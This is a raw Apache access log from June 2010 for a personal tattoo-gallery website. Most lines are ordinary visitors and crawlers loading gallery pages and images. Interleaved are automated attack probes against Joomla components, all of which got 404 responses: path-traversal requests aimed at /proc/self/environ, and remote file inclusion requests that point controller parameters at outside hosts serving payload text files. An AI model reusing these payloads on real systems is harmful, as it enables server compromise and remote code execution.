71.82.219.59 - - [21/Jun/2010:07:20:13 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:13 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:13 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:13 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:13 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:13 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:13 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:35 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:20:36 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:02 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:02 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:02 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:02 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:02 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:02 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:02 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:02 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:03 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:03 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:03 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:21:35 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:22:06 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:22:07 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:22:07 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
71.82.219.59 - - [21/Jun/2010:07:22:07 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
195.22.10.103 - - [21/Jun/2010:07:25:28 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:07:25:28 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:07:25:29 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:07:32:30 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:07:32:30 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:07:32:31 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:07:47:05 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:07:47:05 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:07:47:06 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
82.32.4.110 - - [21/Jun/2010:07:48:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:39 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:39 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:40 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:40 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:41 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:41 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:41 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:42 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:43 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:44 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:44 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.32.4.110 - - [21/Jun/2010:07:48:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
220.181.7.97 - - [21/Jun/2010:08:02:52 -0500] "GET /logs/access_log.1270857600 HTTP/1.1" 304 - "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
195.22.10.103 - - [21/Jun/2010:08:03:37 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.63.197.215 - - [21/Jun/2010:08:13:47 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:13:47 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:13:47 -0500] "GET /index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:13:48 -0500] "GET /index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:13:48 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:13:48 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:13:57 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:13:57 -0500] "GET /index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:14:00 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:14:23 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:14:30 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:14:36 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:15:15 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:15:15 -0500] "GET /index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:15:15 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:15:30 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:15:30 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:15:30 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:15:35 -0500] "GET /index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:15:35 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:15:35 -0500] "GET /logs/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:15:47 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:15:47 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:15:47 -0500] "GET /index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:15:52 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:16:07 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:16:13 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:16:13 -0500] "GET /logs/access_log.1274832000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:16:13 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:16:18 -0500] "GET /index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
